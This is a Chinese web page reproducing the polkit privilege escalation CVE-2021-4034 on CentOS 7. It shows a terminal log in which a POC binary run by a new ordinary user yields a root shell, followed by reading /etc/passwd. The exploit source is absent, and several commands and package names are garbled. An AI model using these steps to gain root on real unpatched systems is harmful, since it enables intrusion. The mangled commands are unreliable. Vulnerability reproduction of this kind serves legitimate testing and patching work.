Linuxpolkit本地权限提升漏洞(CVE-2021-4034)修复案例与POC复现方法

阅读: 评论:0

2024年2月3日发(作者:)

Linuxpolkit本地权限提升漏洞(CVE-2021-4034)修复案例与POC复现方法

版本漏洞验证通过以下命令可查看Polkit是否为安全版本[root@node01 ~]# rpm -qa 7_9.1.x86_64漏洞复现POC--修复前[root@node02 ~]# cat /etc/redhat-release

CentOS Linux release 7.6.1810 (Core)

[root@node02 ~]# uname -aLinux node02 7.x86_64 #1 SMP Thu Nov 8 23:39:32 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux[root@node02 ~]# rpm -aq | grep 7.x86_7.x86_64[root@node02 ~]# useradd liangliang[root@node02 ~]# passwd liangliangChanging password for user password:

Retype new password:

passwd: all authentication tokens updated successfully.[root@node02 ~]# cve-2021-4034-poc[root@node02 ~]# cp cve-2021-4034-poc /home/liangliang/[root@node02 ~]# chmod 755 /home/liangliang/cve-2021-4034-poc

[root@node02 ~]# su - liangliang[liangliang@node02 ~]$ ./cve-2021-4034-poc

sh-4.2#

sh-4.2#

sh-4.2# iduid=0(root) gid=0(root) groups=0(root),2334(liangliang)sh-4.2# cat /etc/passwd

Linuxpolkit本地权限提升漏洞(CVE-2021-4034)修复案例与POC复现方法

本文发布于:2024-02-03 21:22:08,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170696652851333.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:漏洞   复现   案例   命令   权限   修复
留言与评论(共有 0 条评论)
   
验证码:
排行榜

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23